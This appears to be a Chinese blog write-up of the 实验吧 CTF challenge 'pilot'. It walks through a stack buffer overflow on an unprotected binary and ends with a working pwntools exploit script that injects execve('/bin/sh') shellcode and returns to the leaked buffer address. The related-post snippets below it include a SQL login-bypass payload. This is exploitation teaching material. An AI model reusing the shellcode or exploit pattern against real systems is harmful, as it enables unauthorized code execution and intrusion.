实验吧_pilot

最新推荐文章于 2019-07-28 03:06:47 发布
原创 最新推荐文章于 2019-07-28 03:06:47 发布 · 529 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本次实验旨在检验前期对栈溢出的掌握程度。给出了实验文件的百度网盘链接及提取码。实验步骤包括检验pilot保护机制,发现可进行栈溢出操作;对文件进行静态和动态分析,确定ret位置,编写payload,最终实现getshell,还附上了exp.py。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验目的

用过这次实验去检验我们前期对栈溢出的掌握程度

实验文件

链接:https://pan.baidu.com/s/1riY3T8_tcNUb_08ltAd3mA
提取码:5d4d

实验步骤

首先对pilot的保护机制进行检验
在这里插入图片描述
发现程序没有开启任何保护,且有可读、可写、可执行段,说明我们可以进行栈溢出操作。

对文件进行静态分析:
在这里插入图片描述
其实pilot前面的一大段都没有什么用,我们只需要看输入函数read,因为可以进行no canary found,所以我们可以在这里进行栈溢出操作。

然后进行动态分析:
在这里插入图片描述

得到到ret的位置为0x40.。
所以我们可以编写payload:

p.recvuntil('Command:')
shellcode = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'

最后就能进行getshell。

在这里插入图片描述
最后附上exp.py

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal = ['gnome-terminal','-x','sh','-c']
p=process('./pilot')
#pwnlib.gdb.attach(p)
p.recvuntil('Location:')
buf_addr = int(p.recvuntil('\n')[:-1], 16)
p.recvuntil('Command:')
shellcode = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
payload = shellcode + (40 - len(shellcode)) * 'A' + p64(buf_addr)
p.sendline(payload)
p.interactive()
Han&Joe
关注
实验吧CTF-web
code_lab
02-27 6497
登陆一下好吗类型:sql注入已经过滤了/ # -- select or union |等,但是没有过滤单引号payload:username=pcat'='&password=pcat'='原sql语句为:select * from user where username='用户名' and password='密码'拼接后为:select * from user where username='p
实验
qq_42137684的博客
02-24 875
1.变异凯撒 把flag转化为ascii码,加密密文转化为ascii码, 因为是凯撒加密,所以思考移动的位数,分别是加了5,6,7,8.。。。  所以移动的位次是从5递加   得到结果    ascii码值转化,得到flag, flag{Caesar_variation}。 2.奇怪的短信   根据题目提示,是奇怪的短信,然后一串不长的阿拉伯数字,把手机键盘...
实验吧-杂项-pilot-logic、ROT-13变身了
weixin_30319097的博客
03-03 217
1、pilot-logic 题上说password藏在文件里,直接丢到Winhex里,搜索pass就拿到flag了。 有的大佬提供了另一种方法,题上说是一个磁盘文件,有一个处理磁盘文件的软件autopsy,不过这个软件有点大(超过500M),可以直接导入后就能看到flag了。 2、ROT-13变身了 ROT13(回转13位,rotate by 1...
实验吧(1)
Monkey233333的博客
08-19 412
实验吧真是一个神奇的地方,里面的东西表示全部都看不懂,emmmmm  ,加油!好好学习!  案例:忘记密码了! 在实验吧里面打开解题链接,然后就会跳转到一个输入密码的页面,当然你是不知道密码的,所以这题是寻找密码。 是这样的一个页面,然后随便输入一串数字,一般来说都是错误的,然后你打开网页的源文件   在网页控制台上复制代码,就可以解出a的值。  ...
实验吧-----IHDR
weixin_40709439的博客
08-09 4154
解题链接: http://ctf5.shiyanbar.com/stega/IHDR.png 有点坑哈,点开链接发现图片因存在错误而无法显示,一开始我是以为题目炸了,直接跳过。后来才知道。。。坑 可以利用脚本下载 import requests import io,sys sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encod...
main4.zip_pilot
07-14
在"main4.zip_pilot"中,可能包含的文件可能有实验数据、算法实现、性能仿真结果或者相关的技术报告。这些内容可能涉及不同环境下的导频设计,比如在高频毫米波通信、大规模MIMO(多输入多输出)系统或者移动通信...
操作系统通过随机数产生一个指令序列.rar_generator pilot
09-23
本文所探讨的,是一个特定实验——通过随机数生成指令序列,并将其转换为页地址流,以模拟操作系统在虚拟内存管理上的运作方式。 首先,我们来分析一下随机数在操作系统中的应用。在进程调度领域,操作系统需要根据...
Pilot_jsPsych
03-28
Pilot_jsPsych:探索HTML心理实验编程的艺术》 在当今的心理学研究中,数字化实验已经成为主流趋势,而jsPsych则是一种广泛使用的JavaScript库,专为在线心理学实验设计。"Pilot_jsPsych"项目,正如其名,是针对...
Pilot_jsPsych:实验版代码与自定义功能
资源摘要信息:"Pilot_jsPsych是一个以JavaScript库为基础的实验运行平台,专注于心理学研究和认知科学实验。它提供了一套完整的工具集,使得研究者和开发者可以构建实验、收集数据、统计分析,并最终导出结果。该...
AMoRE-Pilot无中微子双β衰变实验的初步结果
03-28
先进的基于钼的稀有过程实验(AMoRE)旨在寻找$$ ^ {100} $ 100 Mo和$$ \ sim 100 \的中... 我们报告了AMoRE-Pilot $$ 0 \ nu \ beta \ beta $$0νββ搜索的第一个结果,其中包含111kg的每日实时曝光量为$$ ^ {48 {
PythonPilot:在Python中重新实现第一阶段Capture Pilot HTTP接口
03-15
PythonPilot 在Python中重新实现第一阶段Capture Pilot HTTP接口 支持使用Wifi从任何IQ系列获取和设置不同的参数(快门速度,ISO,文件格式等)。 支持低级异步功能API,也支持与数据库的基于简单对象的接口。 用法 PythonPilot API: 安装 很简单,只需在您选择的文件夹中创建一个虚拟环境,然后从requirements.txt文件中安装需求,然后就可以开始使用API​​进行开发了。 实际的python包仍然是WIP。 python -m venv venv source venv/bin/activate # or . venv/bin/activate.fish if you are a cool person. pip install -r requirements.txt 用法 在制品 未来目标 实际的python包 通过Kiv
#实验吧--MISC
DVK
12-08 855
1.MD5之守株待兔,你需要找到和系统锁匹配的钥匙 GET方式提交一个key,得到key的md5。 几次提交发现:系统生成的md5是随机的。联想随机数据发现:提交速度快时系统的md5是不变的。 因此可以猜测:系统的md5是否是和时间有关?尝试用时间的几个组合。。。未果 试试直接用py的获取时间函数。 成功了。 这题要熟悉一下1、py request包的使用,2、py time.time...
实验吧_ROPBABY
weixin_44681716的博客
05-04 453
实验目的 用过这次实验去检验我们前期对栈溢出的掌握程度 实验文件 链接:https://pan.baidu.com/s/14fPpj6nULpywKwMv21r7rA 提取码:qbp9 实验步骤 首先检验ropbaby的保护机制 发现栈是no canary found,我们可以进行栈溢出。 首先对文件进行静态分析 ...
实验吧-简单的sql注入 Writeup
baynk的博客
07-28 475
又弄了一个,虽然说不难,但是这个有点蛋疼- -,有些地方坑了好久。。。 过程 一开始就是简单的输入数值进行查询,加引号后发现有报错。 单引号闭合,试过了#和-- 都被过滤了,没法使用,所以试试自己闭合,这次是OK的。 回显点应该只有一个,就是name了,这里就不试order by 了。直接union select,但是union select好像都被过滤了。试了下双写,发现过滤的时候如果最后不是...
实验吧——WEB-FALSE
迷风小白
04-12 2784
FALSE hint:sha1函数你有认真了解过吗?听说也有人用md5碰撞o(╯□╰)o 查看源码 <?php if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '<p>Your password c...
实验吧 认真一点
xingyyn78的博客
03-30 7197
        本实验是输入id获取结果,查看页面源码,没有什么注释信息。随便输入个1,结果为You are in ...............,其他的id显示为You are not in ...............        使用Burp suite进行模糊测试,结果为or部分sql命令都可以使用。        但是使用or命令注入失败,但是从模糊测试来看是没有屏蔽or关键字,应该...
实验吧 认真一点!
Assassin
01-31 3155
真的很久很久没碰过这个玩意了,真是不会了,而且这个题目本身就不是很容易,搞得我也是满肚子邪火,很气。这个题目主要难在它吧过滤和ban结合到了一起了。我们还是先看题目,首先拿到题目看到输入id=0和输入id=1结果不一样,这就奠定了盲注的基础了 然后我们肯定要fuzz一下,结果如下 禁了union、and、substr,sleep,堵住了时间盲注、联合查询注入的路子,而且还把逗号禁止了…这
实验吧———小苹果
落花四月
03-29 1062
今天我很开心,因为我有了第一个粉丝,这也在指引着我,让我继续努力着!我会加油好好学习,坚持每天为你们这些 小可爱更新更优质的文章! 永远爱你们的 ————新宝宝 1:最低位亲吻; 解题思路:这题正常的套路应该是取出每个像素的最低位(0或1按照0黑1白不行的话再反色)来得到二维码,不过我们不走寻常路,将bmp在画图中另存为png格式就可以了,因为我们png时偶然发现左上角有二维码的感...
实验吧--天下武功为快不破
qq_41281571的博客
07-31 496
实验吧–天下武功为快不破 知识点: 在python中,对于base64加密解密方法的流程和注意点 先要引入base64库,import base64 加密: 结果=base64.b64encode(要加密的字符串) 解密:结果=base64.b64decode(要解密的字符串) 千万要注意:要解密的字符串要符合base64的格式,比方说后面要有两个等号。而且,解密后的值并不是字符串类型。也...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值